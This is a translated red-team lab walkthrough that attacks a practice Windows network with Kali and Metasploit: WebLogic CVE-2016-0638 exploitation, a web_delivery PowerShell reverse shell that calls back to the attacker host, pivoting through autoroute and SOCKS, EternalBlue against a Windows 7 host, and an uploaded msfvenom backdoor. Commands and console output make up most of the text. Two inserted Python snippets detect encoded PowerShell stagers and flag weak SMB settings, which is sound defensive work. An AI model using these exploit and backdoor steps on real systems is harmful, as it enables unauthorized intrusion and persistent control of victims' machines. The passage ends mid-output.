Internal Network Lab | Red Team Internal Domain Penetration Lab 1 (Metasploit): From Zero to Proficient, This One Article Is All You Need


This is the same lab as yesterday's article, but this time the work is done mainly with Kali Linux and Metasploit, to get familiar with how MSF is used during internal network penetration. For learning and reference only; experienced readers, please be gentle. The lab in this article comes from the WeChat public account 渗透攻击红队.

Lab download: https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ (extraction code: vbi2)

Statement: this article only records and summarizes a personal learning process. Do not use the techniques described here for illegal testing; any adverse consequences arising from doing so have nothing to do with the author or this public account.

01

Environment Overview

  • Attacker machine:
    • Kali Linux: 172.20.4.16
  • Target machines:
    • Windows Server 2012 R2: 172.20.4.30, 10.10.20.12
    • Windows 7 x64: 10.10.20.7, 10.10.10.7
    • Windows Server 2008 R2 x64: 10.10.10.18
    • Windows Server 2008 R2 x64: 10.10.10.8

02

External Foothold

Information Gathering

Port-scan the target IP with nmap:

```
nmap -v -Pn -T3 -sV -n -sT --open 172.20.4.30

# -v: enable verbose mode, which prints more detailed scan information
# -Pn: skip host discovery; treat the target as up and go straight to port scanning
# -T3: normal timing template (the default); nmap supports six levels from -T0 (slowest) to -T5 (fastest)
# -sV: service version detection, trying to identify the services running on the target and their versions
# -n: never do DNS resolution; scan by IP address rather than hostname
# -sT: TCP connect scan
# --open: only show open ports, which filters the output down to hosts that actually have something listening
```

The scan finds port 7001 open, running WebLogic.

Visiting the web service shows the classic WebLogic 404 page.

Visiting /console redirects automatically to the admin login page at /console/login/LoginForm.jsp.

The login page shows the current version as 12.1.3.0.0.

WebLogic CVE-2016-0638

Use WeblogicTool to check for the vulnerability:

https://github.com/KimJun1010/WeblogicTool

CVE-2016-0638 is present, and commands run with administrator privileges.

Use command execution to look at the system information.

The operating system is Windows Server 2012 R2.

The MSF web_delivery module

```
msfconsole
msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > info

       Name: Script Web Delivery
     Module: exploit/multi/script/web_delivery
   Platform: Python, PHP, Windows, Linux, OSX
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2013-07-19

Provided by:
  Andrew Smith "jakx" <jakx.ppr@gmail.com>
  Ben Campbell <eat_meatballs@hotmail.co.uk>
  Chris Campbell
  Casey Smith
  Trenton Ivey
  g0tmi1k
  bcoles <bcoles@gmail.com>
  Matt Nelson
  phra
  Nick Landers

Available targets:
      Id  Name
      --  ----
  =>  0   Python
      1   PHP
      2   PSH
      3   Regsvr32
      4   pubprn
      5   SyncAppvPublishingServer
      6   PSH (Binary)
      7   Linux
      8   Mac OS X

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module quickly fires up a web server that serves a payload.

  The module will provide a command to be run on the target machine
  based on the selected target. The provided command will download
  and execute a payload using either a specified scripting language
  interpreter or "squiblydoo" via regsvr32.exe for bypassing
  application whitelisting.

  The main purpose of this module is to quickly establish a session on a
  target machine when the attacker has to manually type in the command:
  e.g. Command Injection, RDP Session, Local Access or maybe Remote
  Command Execution.

  This attack vector does not write to disk so it is less likely to
  trigger AV solutions and will allow privilege escalations supplied
  by Meterpreter.

  When using either of the PSH targets, ensure the payload architecture
  matches the target computer or use SYSWOW64 powershell.exe to execute
  x86 payloads on x64 machines.

  Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.
  The signed Microsoft binary file, Regsvr32, is able to request an .sct
  file and then execute the included PowerShell command inside of it.

  Similarly, the pubprn target uses the pubprn.vbs script to request and
  execute a .sct file.

  Both web requests (i.e., the .sct file and PowerShell download/execute)
  can occur on the same port.

  The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe
  Microsoft signed binary to request and execute a PowerShell script. This
  technique only works on Windows 10 builds <= 1709.

  "PSH (Binary)" will write a file to the disk, allowing for custom binaries
  to be served up to be downloaded and executed.

References:
  https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
  https://www.pentestgeek.com/2013/07/19/invoke-shellcode/
  http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
  https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
  https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
  https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
  https://iwantmore.pizza/posts/amsi.html
  https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
  https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
  https://lolbas-project.github.io/lolbas/Scripts/Pubprn/


View the full module info with the info -d command.

msf6 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python



View the full module info with the info, or info -d command.
```

By default it listens on local port 8080 and offers nine targets (delivery methods). Here we use PSH, with windows/x64/meterpreter/reverse_tcp as the reverse shell payload.

```
msf6 exploit(multi/script/web_delivery) > set target 2
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 172.20.4.16
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.4.16      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.20.4.16:4444
msf6 exploit(multi/script/web_delivery) > [*] Using URL: http://172.20.4.16:8080/K4i2VMdAmipU
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e <base64-encoded command omitted>
```

This generates a PowerShell reverse shell one-liner:

```
powershell.exe -nop -w hidden -e <base64-encoded command omitted>
```
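From the defender's side, the one-liner above is exactly the command-line shape that endpoint telemetry (Sysmon event 1, Windows 4688 with command-line auditing) should catch: `-nop`, `-w hidden` and `-e` together, with a base64 blob that decodes (UTF-16LE) to a download-and-execute stager. The following is an added example, not part of the original article or of Metasploit, showing how such a detector decodes and scores a captured command line. The encoded blob from the article is not reproduced; the samples below are constructed, and 192.0.2.10 is a documentation address.

```python
import base64
import binascii

# Keywords in the decoded script typical of download-and-execute stagers (detection content).
STAGER_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE text; used here only to build test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """What a sensor does with the blob after -e: strict base64 decode, then UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")


def analyse_command_line(cmdline: str) -> dict:
    """Flag the -nop / -w hidden / -e switch combination and inspect the decoded payload."""
    tokens = cmdline.split()
    flags = set()
    decoded = None
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if low in ("-nop", "-noprofile"):
            flags.add("noprofile")
        elif low in ("-w", "-win", "-windowstyle") and nxt == "hidden":
            flags.add("hidden")
        elif low in ("-e", "-ec", "-enc", "-encodedcommand") and nxt:
            flags.add("encoded")
            try:
                decoded = decode_encoded_command(tokens[i + 1])
            except (binascii.Error, ValueError):
                decoded = None  # not valid base64: keep the flag, nothing to inspect
    indicators = [k for k in STAGER_KEYWORDS if decoded and k in decoded.lower()]
    # Encoded + hidden window, or encoded + stager keywords, is the web_delivery shape.
    suspicious = "encoded" in flags and ("hidden" in flags or bool(indicators))
    return {"flags": sorted(flags), "decoded": decoded, "indicators": indicators, "suspicious": suspicious}


# Constructed sample in the shape web_delivery prints (documentation address, not a real host).
SAMPLE_STAGER = "powershell.exe -nop -w hidden -e " + encode_for_powershell(
    "IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/example'))")
# Constructed benign comparison: encoded, but neither hidden nor a stager.
SAMPLE_BENIGN = "powershell.exe -e " + encode_for_powershell("Get-Date")

if __name__ == "__main__":
    for sample in (SAMPLE_STAGER, SAMPLE_BENIGN):
        result = analyse_command_line(sample)
        print(result["suspicious"], result["flags"], result["indicators"])
```

The decode step matters more than the switch match: `-e` on its own is common in legitimate automation, so a rule that fires on the switch alone is noisy, while the decoded content plus the hidden window separates the stager from a scheduled task.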

Run it on the target through WeblogicTool's command execution feature; after a short wait a session comes back.

Interact with the session: we have an Administrator Meterpreter shell.

```
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                        Connection
  --  ----  ----                     -----------                        ----------
  1         meterpreter x64/windows  WEBLOGIC\Administrator @ WEBLOGIC  172.20.4.16:4444 -> 172.20.4.30:59631 (172.20.4.30)

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WEBLOGIC\Administrator
```

Drop into an interactive shell and check the machine's network configuration:

```
meterpreter > shell
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>chcp 65001 # switch to the UTF-8 code page to fix garbled output
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::4116:2a67:3c40:e05c%14
   IPv4 Address. . . . . . . . . . . : 10.10.20.12
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.20.1

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::ccb5:101a:b773:f705%12
   IPv4 Address. . . . . . . . . . . : 172.20.4.30
   Subnet Mask . . . . . . . . . . . : 255.255.252.0
   Default Gateway . . . . . . . . . : 172.20.7.254

Tunnel adapter isatap.{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{8F6412DB-D757-413C-97E1-76F7DB61BD9C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
```

There is a second NIC with address 10.10.20.12, so an internal network exists behind this host.

Probe for hosts on each segment:

```
meterpreter > arp -a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    10.10.20.7       00:0c:29:91:d2:55  Intel(R) 82574L 千兆网络连接 #2
    10.10.20.128     00:50:56:e7:08:15  Intel(R) 82574L 千兆网络连接 #2
    10.10.20.255     ff:ff:ff:ff:ff:ff  Intel(R) 82574L 千兆网络连接 #2
    ......
```

A quick check of whether the machine is domain-joined:

```
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>net config workstation
net config workstation
Computer name                        \\WEBLOGIC
Full Computer name                   weblogic
User name                            Administrator

Workstation active on
        NetBT_Tcpip_{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C} (000C2984D6EB)
        NetBT_Tcpip_{8F6412DB-D757-413C-97E1-76F7DB61BD9C} (000C2984D6E1)

Software version                     Windows Server 2012 R2 Datacenter

Workstation domain                   WORKGROUP
Logon domain                         WEBLOGIC

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.
```

It is not in a domain (workgroup WORKGROUP).

03

Internal Network Penetration

Internal Network Information Gathering

At this point MSF cannot reach hosts on the 10.10.20.x segment, so a route through the session must be added:

```
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.20.0/255.255.255.0
Local subnet: 172.20.4.0/255.255.252.0
......
meterpreter > run autoroute -s 10.10.20.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.20.0/255.255.255.0...
[+] Added route to 10.10.20.0/255.255.255.0 via 172.20.4.30
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.20.0         255.255.255.0      Session 1
```

Background the current session first:

```
meterpreter > background
```

Then start a SOCKS5 proxy:

```
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
```

The proxy listens on local port 1080 by default.

Set MSF's global proxy:

```
msf6 > setg Proxies socks5:172.20.4.16:1080 # set a global proxy for msf
msf6 > setg ReverseAllowProxy true # allow reverse shells through the proxy
```

Next, probe the internal network.

Scan the 10.10.20.x segment with the smb_version module:

```
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhost 10.10.20.0/24
rhost => 10.10.20.0/24
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 20
THREADS => 20
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.20.7:445        - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)
[+] 10.10.20.7:445        -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)
[*] 10.10.20.12:445       - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)
[+] 10.10.20.12:445       -   Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)
......
```

There is another machine running Windows 7, hostname WORK-7, IP 10.10.20.7.
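The smb_version lines above carry more than the hostname: `versions:1, 2` means SMBv1 is still negotiable (the dialect MS17-010 needs), and `signatures:optional` means SMB signing is not enforced. As an added example, not from the article or from Metasploit, the parser below turns that output into per-host records and lists the hardening findings a defender would act on. The sample is the four lines printed above.

```python
import re

# One smb_version result line: "[*] ip:port - SMB Detected (...)..." or "[+] ip:port -   Host is running SMB Detected (...)..."
LINE_RE = re.compile(
    r"^\[[*+]\]\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+(?:Host is running )?SMB Detected\s*(?P<rest>.*)$")


def _field(rest: str, key: str):
    """Value of a parenthesised (key:value) field; requires the literal '(' so 'domain' does not match 'authentication domain'."""
    m = re.search(r"\(" + re.escape(key) + r":([^)]*)\)", rest)
    return m.group(1).strip() if m else None


def parse_smb_version(output: str) -> dict:
    """Return {ip: record}; the [*] and [+] lines for one host collapse into a single record."""
    hosts = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rest = m.group("rest")
        versions = [int(v) for v in (_field(rest, "versions") or "").split(",") if v.strip().isdigit()]
        # OS string sits between the closing ')' of the last field and '(build:NNNN)'.
        os_match = re.search(r"\)\s*([A-Za-z][^()]*?)\s*\(build:(\d+)\)", rest)
        hosts[m.group("ip")] = {
            "port": int(m.group("port")),
            "versions": versions,
            "dialect": _field(rest, "preferred dialect"),
            "signatures": _field(rest, "signatures"),
            "name": _field(rest, "name"),
            "domain": _field(rest, "domain"),
            "os": os_match.group(1) if os_match else None,
            "build": int(os_match.group(2)) if os_match else None,
        }
    return hosts


def hardening_findings(hosts: dict) -> dict:
    """Per host, the configuration weaknesses visible from the banner alone."""
    findings = {}
    for ip, rec in hosts.items():
        issues = []
        if 1 in rec["versions"]:
            issues.append("smbv1-enabled")         # SMBv1 negotiable: disable it (MS17-010 exposure)
        if rec["signatures"] == "optional":
            issues.append("signing-not-required")  # signing optional: enables NTLM relay; require it
        if rec["build"] is not None and rec["build"] <= 7601:
            issues.append("end-of-life-os")        # 7601 = Windows 7 SP1 / Server 2008 R2 SP1, out of support
        findings[ip] = issues
    return findings


# Sample input: the four result lines from the scan above.
SAMPLE_OUTPUT = """
[*] 10.10.20.7:445        - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)
[+] 10.10.20.7:445        -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)
[*] 10.10.20.12:445       - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)
[+] 10.10.20.12:445       -   Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)
"""

if __name__ == "__main__":
    hosts = parse_smb_version(SAMPLE_OUTPUT)
    for ip, issues in hardening_findings(hosts).items():
        print(ip, hosts[ip]["name"], hosts[ip]["os"], issues)
```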

Getting a session on WORK-7 with MS17-010 (EternalBlue)

We can try EternalBlue against it.

Search for MS17-010 modules:

```
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
```

First check with auxiliary/scanner/smb/smb_ms17_010:

```
msf6 > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                           Required  Description
   ----         ---------------                                           --------  -----------
   CHECK_ARCH   true                                                      no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                      no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                     no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pip  yes       List of named pipes to check
                es.txt
   RHOSTS                                                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        445                                                       yes       The SMB service port (TCP)
   SMBDomain    .                                                         no        The Windows domain to use for authentication
   SMBPass                                                                no        The password for the specified username
   SMBUser                                                                no        The username to authenticate as
   THREADS      1                                                         yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.20.7
rhosts => 10.10.20.7
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.20.7:445        - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.20.7:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The check reports that the target machine is vulnerable to EternalBlue (MS17-010).

Attack with exploit/windows/smb/ms17_010_eternalblue:

```
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.20.7
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 5555
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 10.10.20.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.20.7:445        - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.20.7:445        - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.20.7:445 - The target is vulnerable.
[*] 10.10.20.7:445 - Connecting to target for exploitation.
[+] 10.10.20.7:445 - Connection established for exploitation.
[+] 10.10.20.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.20.7:445 - CORE raw buffer dump (38 bytes)
[*] 10.10.20.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.10.20.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 10.10.20.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 10.10.20.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.20.7:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.20.7:445 - Sending all but last fragment of exploit packet
[*] 10.10.20.7:445 - Starting non-paged pool grooming
[+] 10.10.20.7:445 - Sending SMBv2 buffers
[+] 10.10.20.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.20.7:445 - Sending final SMBv2 buffers.
[*] 10.10.20.7:445 - Sending last fragment of exploit packet!
[*] 10.10.20.7:445 - Receiving response from exploit packet
[+] 10.10.20.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.20.7:445 - Sending egg to corrupted connection.
[*] 10.10.20.7:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.10.20.7:5555
[*] Sending stage (201798 bytes) to 10.10.20.7
[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 2 opened (10.10.20.12:63973 -> 10.10.20.7:5555 via session 1) at 2024-03-25 10:20:28 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WORK-7
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : REDTEAM
Logged On Users : 2
Meterpreter     : x64/windows
```

It took several attempts to succeed, but we now have SYSTEM on WORK-7, and the system information shows it belongs to the domain REDTEAM.

Since the current Meterpreter session may be unstable, generate an exe backdoor that listens for a bind (forward) connection:

```
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=172.20.4.16 lport=6666 -f exe > 6666.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 496 bytes
Final size of exe file: 7168 bytes
```

Upload 6666.exe to the target and run it:

```
meterpreter > upload /root/桌面/6666.exe c:\\
[*] Uploading  : /root/桌面/6666.exe -> c:\6666.exe
[*] Completed  : /root/桌面/6666.exe -> c:\6666.exe
meterpreter > ls c:
Listing: c:
===========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2021-11-05 18:27:12 +0800  $Recycle.Bin
100777/rwxrwxrwx  7168    fil   2024-03-25 10:29:34 +0800  6666.exe
040777/rwxrwxrwx  0       dir   2009-07-14 13:08:56 +0800  Documents and Settings
040777/rwxrwxrwx  0       dir   2009-07-14 11:20:08 +0800  PerfLogs
040555/r-xr-xr-x  4096    dir   2024-03-15 16:05:22 +0800  Program Files
040555/r-xr-xr-x  4096    dir   2021-11-05 18:29:05 +0800  Program Files (x86)
040777/rwxrwxrwx  4096    dir   2021-11-05 18:29:05 +0800  ProgramData
040777/rwxrwxrwx  0       dir   2021-11-05 17:00:46 +0800  Recovery
040777/rwxrwxrwx  8192    dir   2024-03-23 21:12:06 +0800  System Volume Information
040555/r-xr-xr-x  4096    dir   2021-11-05 18:28:43 +0800  Users
040777/rwxrwxrwx  16384   dir   2024-03-24 10:16:18 +0800  Windows
000000/---------  0       fif   1970-01-01 08:00:00 +0800  pagefile.sys
100777/rwxrwxrwx  295936  fil   2024-03-24 10:29:05 +0800  windowstempzhuanfa.exe

meterpreter > shell

C:\Windows\system32>c:/6666.exe
```

Background the current session and set up the handler:

```
C:\Windows\system32>exit
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
msf6 exploit(multi/handler) > set rhost 10.10.20.7
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.10.20.7:6666
[*] Sending stage (201798 bytes) to 10.10.20.7
[*] Meterpreter session 3 opened (10.10.20.12:49268 -> 10.10.20.7:6666 via session 1) at 2024-03-25 10:47:43 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WORK-7
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : REDTEAM
Logged On Users : 3
Meterpreter     : x64/windows
```

The bind backdoor connects successfully; now gather information on this machine:

```
meterpreter > shell
Process 2540 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : work-7
   Primary Dns Suffix  . . . . . . . : redteam.red
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
